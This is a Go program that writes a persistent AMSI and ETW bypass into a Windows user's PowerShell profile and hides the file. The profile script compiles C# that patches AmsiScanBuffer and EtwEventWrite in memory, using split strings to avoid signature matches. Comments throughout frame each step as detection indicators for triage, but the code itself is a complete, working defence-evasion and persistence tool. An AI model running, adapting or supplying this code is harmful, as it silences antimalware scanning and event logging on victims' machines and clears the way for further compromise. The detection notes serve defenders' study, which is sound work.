package main
import (
"os"
"os/exec"
"path/filepath"
"fmt"
)
// main appends a PowerShell script that patches AMSI and ETW into the current
// user's Windows PowerShell profile and then hides the profile file.
//
// Everything this program leaves on a host is visible in the code below, which
// makes it a compact list of what to look for when triaging:
//   - An append to %USERPROFILE%\Documents\WindowsPowerShell\
//     Microsoft.PowerShell_profile.ps1, the per-user "current host" Windows
//     PowerShell 5.x profile. Whatever is in that file runs at startup of every
//     Windows PowerShell console for that user, so the change persists until
//     the profile is cleaned.
//   - The profile content compiles a C# type with Add-Type (PowerShell spawns
//     csc.exe to do this) that overwrites the entry of AmsiScanBuffer in
//     amsi.dll and of EtwEventWrite in ntdll.dll inside the PowerShell process.
//   - An "attrib +h +s" run on the profile to mark it hidden and system.
//
// Every failure path panics; a partially written profile is not cleaned up.
func main() {
	// Home directory of the user running this binary; the profile path is
	// built from it rather than from $PROFILE.
	up, err := os.UserHomeDir()
	if err != nil {
		panic(err)
	}
	// Windows PowerShell 5.x per-user profile. PowerShell 7 (pwsh) reads
	// Documents\PowerShell\... instead, so pwsh sessions are not touched.
	psprofpath := filepath.Join(up, "Documents", "WindowsPowerShell", "Microsoft.PowerShell_profile.ps1")
	// os.ModePerm (0777) is largely ignored on Windows; the directory is
	// created so the write succeeds on a machine where the user has never
	// had a profile.
	err = os.MkdirAll(filepath.Dir(psprofpath), os.ModePerm)
	if err != nil {
		panic(err)
	}
	// O_APPEND|O_CREATE: an existing profile is extended, not replaced, so the
	// user's own profile content keeps working and the file does not look
	// freshly created. Checking the tail of this file is the quickest way to
	// confirm whether a host is affected.
	file, err := os.OpenFile(psprofpath, os.O_APPEND|os.O_WRONLY|os.O_CREATE, os.ModePerm)
	if err != nil {
		panic(err)
	}
	// The Close error is discarded; a failed write is already caught via
	// WriteString below.
	defer file.Close()
	// The PowerShell payload, written verbatim into the profile. This is a Go
	// raw string: nothing between the backticks is interpreted by Go, and the
	// C# "// RET opcode" comment is part of the emitted text.
	//
	// Points that matter for detection and response:
	//   - "amsi.dll" and "AmsiScanBuffer" are assembled from single-character
	//     string concatenations, presumably so the literal names never appear
	//     in the on-disk file; a content rule should match the concatenation
	//     pattern or the API usage, not the plain names.
	//   - PatchAmsi: VirtualProtect to PAGE_EXECUTE_READWRITE (0x40) on
	//     AmsiScanBuffer, then Marshal.Copy of 31 C0 C3 (xor eax,eax; ret) so
	//     the function returns immediately. The protection is restored after.
	//   - PatchEtwEventWrite: the same protection change on ntdll!EtwEventWrite
	//     plus WriteProcessMemory of a single C3 (ret) into the current
	//     process, so ETW events from that process stop. Neither the
	//     VirtualProtect nor the WriteProcessMemory result is checked.
	//   - Add-Type compiles the type at every session start, so csc.exe
	//     launched by powershell.exe on each console open is a reliable
	//     host-level signal, as is an RWX protection change on amsi.dll or
	//     ntdll.dll export pages.
	//   - The two trailing "cls" lines clear the console, which looks intended
	//     to remove the True/False that [Patcher]::PatchAmsi() prints.
	pscript := `
$amsixetwpatch = @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public class Patcher
{
[DllImport("kernel32.dll")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);
public static bool PatchAmsi()
{
IntPtr h = GetModuleHandle("a" + "m" + "s" + "i" + ".dll");
if (h == IntPtr.Zero) return false;
IntPtr a = GetProcAddress(h, "A" + "m" + "s" + "i" + "S" + "c" + "a" + "n" + "B" + "u" + "f" + "f" + "e" + "r");
if (a == IntPtr.Zero) return false;
UInt32 oldProtect;
if (!VirtualProtect(a, (UIntPtr)5, 0x40, out oldProtect)) return false;
byte[] patch = { 0x31, 0xC0, 0xC3 };
Marshal.Copy(patch, 0, a, patch.Length);
return VirtualProtect(a, (UIntPtr)5, oldProtect, out oldProtect);
}
public static void PatchEtwEventWrite()
{
const uint PAGE_EXECUTE_READWRITE = 0x40;
string ntdllModuleName = "ntdll.dll";
string etwEventWriteFunctionName = "EtwEventWrite";
IntPtr ntdllModuleHandle = GetModuleHandle(ntdllModuleName);
IntPtr etwEventWriteAddress = GetProcAddress(ntdllModuleHandle, etwEventWriteFunctionName);
byte[] retOpcode = { 0xC3 }; // RET opcode
uint oldProtect;
VirtualProtect(etwEventWriteAddress, (UIntPtr)retOpcode.Length, PAGE_EXECUTE_READWRITE, out oldProtect);
int bytesWritten;
WriteProcessMemory(Process.GetCurrentProcess().Handle, etwEventWriteAddress, retOpcode, (uint)retOpcode.Length, out bytesWritten);
}
}
"@
Add-Type -TypeDefinition $amsixetwpatch -Language CSharp
[Patcher]::PatchAmsi()
[Patcher]::PatchEtwEventWrite()
cls
cls
`
	// Appended with a trailing newline so any later profile additions start
	// on a fresh line.
	_, err = file.WriteString(pscript + "\n")
	if err != nil {
		panic(err)
	}
	// attrib +h +s marks the profile hidden and system, so it is not shown by
	// default in Explorer or a plain "dir". Arguments are passed as an argv
	// list with no shell, so psprofpath is not subject to command injection.
	// Get-ChildItem -Force or "dir /a" still lists it, and attrib.exe setting
	// +s on a file under a PowerShell profile directory is an unusual event
	// worth alerting on.
	sigma := exec.Command("attrib", "+h", "+s", psprofpath)
	err = sigma.Run()
	if err != nil {
		panic(err)
	}
	// "Lifetime" here means until the profile is removed or cleaned; nothing
	// else is installed.
	fmt.Println("Lifetime Amsi and ETW Bypass Applied.")
	// Block until Enter is pressed so a double-clicked console stays open;
	// the Scanln result is intentionally ignored.
	fmt.Scanln()
}